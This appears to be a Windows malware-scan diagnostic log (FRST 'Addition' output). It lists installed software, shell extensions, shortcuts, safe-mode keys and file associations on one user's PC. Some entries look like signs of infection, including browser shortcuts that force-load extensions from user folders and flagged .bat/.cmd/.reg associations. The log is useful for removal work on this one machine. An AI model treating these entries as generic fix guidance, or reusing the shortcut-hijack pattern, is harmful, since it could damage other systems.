Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.32.31332 (HKLM-x32\...\{3746f21b-c990-4045-bb33-1cf98cff7a68}) (Version: 14.32.31332.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.32.31332 (HKLM-x32\...\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}) (Version: 14.32.31332.0 - Microsoft Corporation)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332 (HKLM\...\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332 (HKLM\...\{3407B900-37F5-4CC2-B612-5CD5D580A163}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.32.31332 (HKLM-x32\...\{8972AC25-452E-4FFE-945A-EB9E28C20322}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.32.31332 (HKLM-x32\...\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 6.0.10 (x64) (HKLM\...\{3EC7701F-54F2-491D-AFD1-0395F465BC5A}) (Version: 48.43.48870 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 6.0.10 (x64) (HKLM-x32\...\{ff748137-9c9a-4056-be0a-48c7e465453c}) (Version: 6.0.10.31726 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
MSVCRT Redists (HKLM\...\{151C3FD1-4A0B-11EA-8579-00155D6302F2}) (Version: 1.0 - MAGIX Computer Products Intl. Co.) Hidden
MSVCRT Redists (HKLM\...\{84E336E1-F7A1-11EA-AFD6-00155D8D255C}) (Version: 1.0 - MAGIX Computer Products Intl. Co.) Hidden
NetLimiter 4 (HKLM\...\{543BB510-BFE4-4AF9-B6B5-A2A18C7A590E}) (Version: 4.1.14.0 - Locktime Software) Hidden
NetLimiter 4 (HKLM-x32\...\NetLimiter 4 4.1.14.0) (Version: 4.1.14.0 - Locktime Software)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 8.4.6 - Notepad++ Team)
NVIDIA FrameView SDK 1.3.8107.31782123 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8107.31782123 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.26.0.154 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.26.0.154 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 526.47 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 526.47 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 28.0.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.15726.20096 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.15726.20096 - Microsoft Corporation) Hidden
OnTopReplica (HKLM-x32\...\{F149C020-D121-45B2-A630-5DB052413244}) (Version: 3.5.1 - OnTopReplica)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
ParkControl (HKLM-x32\...\ParkControl) (Version: 2.2.2.2 - Bitsum)
PC Building Simulator - Esports Expansion (HKLM-x32\...\1219750541_is1) (Version: v1.15.3 - GOG.com)
PC Building Simulator (HKLM-x32\...\2147483071_is1) (Version: v1.15.3 - GOG.com)
PowerToys (Preview) (HKLM\...\{6E97D19B-84B5-47DF-A03A-0EE9637A8498}) (Version: 0.60.1 - Microsoft Corporation) Hidden
PowerToys (Preview) x64 (HKLM-x32\...\{2b34ef9c-2147-46a9-8bf1-1a0edd1c5a51}) (Version: 0.60.1 - Microsoft Corporation)
qBittorrent 4.4.5 (HKLM-x32\...\qBittorrent) (Version: 4.4.5 - The qBittorrent project)
Razer Synapse (HKLM-x32\...\Razer Synapse) (Version: 3.7.1015.100615 - Razer Inc.)
Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9084.1 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.36.701.2019 - Realtek)
Remove Empty Directories version 2.2 (HKLM-x32\...\{06F25DC8-71E2-44E2-805A-F15E15B51C74}_is1) (Version: 2.2 - Jonas John)
Revo Uninstaller Pro 5.0.6 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 5.0.6 - VS Revo Group, Ltd.)
Roblox Player for Woytman (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\roblox-player) (Version: - Roblox Corporation)
Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.66.1083 - Rockstar Games)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.1.5.1 - Rockstar Games)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.9.0 - Sophos Limited)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_is1) (Version: 0.0.0 - DODI-Repacks)
The Wolf Among Us čeština verze 5.1 (HKLM-x32\...\{47E808C7-0C07-4DF8-877F-7FD653DCDE7B}_is1) (Version: 5.1 - )
TLauncher (HKLM-x32\...\TLauncher) (Version: 2.83 - TLauncher Inc.)
TreeSize Free V4.5.3 (HKLM-x32\...\TreeSize Free_is1) (Version: 4.5.3 - JAM Software)
VEGAS Pro 18.0 (HKLM\...\{82C2EEEE-F7A1-11EA-B428-00155D8D255C}) (Version: 18.0.334 - VEGAS)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.16 - VideoLAN)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.16 - VideoLAN)
Windows Subsystem for Linux Update (HKLM\...\{F8474A47-8B5D-4466-ACE3-78EAB3BF21A8}) (Version: 5.10.102.1 - Microsoft Corporation)
Windows Subsystem for Linux WSLg Preview (HKLM\...\{E04B0005-A349-4BCC-9662-CA0132007E14}) (Version: 1.0.26 - Microsoft Corporation)
WinRAR 6.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.11.0 - win.rar GmbH)
WinSCP 5.21.5 (HKLM-x32\...\winscp3_is1) (Version: 5.21.5 - Martin Prikryl)
Wise Force Deleter 1.5.3 (HKLM-x32\...\Wise Force Deleter_is1) (Version: 1.5.3 - WiseCleaner.com, Inc.)

Packages:
=========
DragonCenter -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.DragonCenter_2.0.100.0_x64__kzh8wxbdkxb8p [2022-09-15] (MICRO-STAR INTERNATIONAL CO., LTD) [Startup Task]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2022-09-30] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2022-09-30] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.14.9130.0_x64__8wekyb3d8bbwe [2022-10-23] (Microsoft Studios) [MS Ad]
Microsoft.PowerToys.ImageResizerContextMenu -> C:\Program Files\PowerToys\modules\ImageResizer [2022-09-15] (0)
MSI Driver & App Center -> C:\Program Files\WindowsApps\msiappadm.MSIDriverAppCenter_1.2009.1001.0_x64__7f61qv3vk9gn2 [2022-11-05] (msiappadm)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.963.0_x64__56jybvy8sckqj [2022-11-05] (NVIDIA Corp.)
Ovládací centrum grafiky Intel® -> C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt [2022-10-23] (INTEL CORP) [Startup Task]
PowerRenameContextMenu -> C:\Program Files\PowerToys\modules\PowerRename [2022-09-15] (0)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.37.275.0_x64__dt26b99r8h8gj [2022-09-15] (Realtek Semiconductor Corp)
WinRAR -> C:\Program Files\WinRAR [2022-04-05] (0)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{36B27788-A8BB-4698-A756-DF9F11F64F84}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.SvgThumbnailProvider.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{45769bcc-e8fd-42d0-947e-02beef77a1f5}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.MarkdownPreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{8BC8AFC2-4E7C-4695-818E-8C1FFDCEA2AF}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.StlThumbnailProvider.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{afbd5a44-2520-4ae0-9224-6cfce8fe4400}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.MonacoPreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{b72e6f5e-f6e0-a9eb-461b-6118363bd15c}\localserver32 -> C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\DeepL.exe (DeepL SE -> DeepL SE)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{BFEE99B4-B74D-4348-BCA5-E757029647FF}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.GcodeThumbnailProvider.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{ddee2b8a-6807-48a6-bb20-2338174ff779}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.SvgPreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{ec52dea8-7c9f-4130-a77b-1737d0418507}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.GcodePreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2022-06-15] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\PROGRAM FILES\NOTEPAD++\NppShell_06.dll [2022-09-03] (Notepad++ -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\modules\PowerRename\PowerToys.PowerRenameExt.dll [2022-07-13] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2022-06-15] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\nvshext.dll [2022-10-26] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2022-06-15] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2022-04-04] (VS Revo Group Ltd. -> VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Woytman\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default" --load-extension="C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni"
ShortcutWithArgument: C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\PřekladyHer.lnk -> C:\Program Files\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=nehnnmpngmglmeflpkegpglfmkfplolf
ShortcutWithArgument: C:\Users\Woytman\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Vojtěch - Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> -–disable-features=RendererCodeIntegrity --profile-directory="Profile 2"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default" --load-extension="C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --load-extension="C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extension\obqblkomnklreiemkjpqnkclimqrclbb\2.8.9._0"

==================== Loaded Modules (Whitelisted) =============

2022-06-25 12:05 - 2022-06-15 14:00 - 000094720 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2017-11-01 19:58 - 2017-11-01 19:58 - 001141248 _____ (Robert Simpson, et al.) [File not signed] C:\Program Files (x86)\Adguard\SQLite.Interop.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"

==================== Association (Whitelisted) =================

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg: regfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat: batfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd: cmdfile => <==== ATTENTION

==================== Internet Explorer (Whitelisted) ==========

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\localhost -> localhost

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2022-09-15 22:37 - 2022-09-15 22:37 - 000000855 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost

2020-12-31 16:28 - 2020-09-26 22:55 - 000000407 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Razer Chroma SDK\bin;C:\Program Files\Razer Chroma SDK\bin;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32\windowspowershell\v1.0;c:\windows\system32\openssh;c:\users\woytman\appdata\local\microsoft\windowsapps;c:\adb;c:\program files\intel\wifi\bin;c:\program files\common files\intel\wirelesscommon;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet;C:\Program Files\dotnet\
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

MSCONFIG\Services: AdobeARMservice => 3
MSCONFIG\Services: AGMService => 3
MSCONFIG\Services: AGSService => 3
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: cplspcon => 2
MSCONFIG\Services: Disc Soft Pro Bus Service => 3
MSCONFIG\Services: EasyAntiCheat => 3
MSCONFIG\Services: EvtEng => 2
MSCONFIG\Services: FvSvc => 3
MSCONFIG\Services: GalaxyCommunication => 3
MSCONFIG\Services: GoogleChromeElevationService => 3
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: igccservice => 2
MSCONFIG\Services: igfxCUIService2.0.0.0 => 2
MSCONFIG\Services: Intel(R) Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: jhi_service => 3
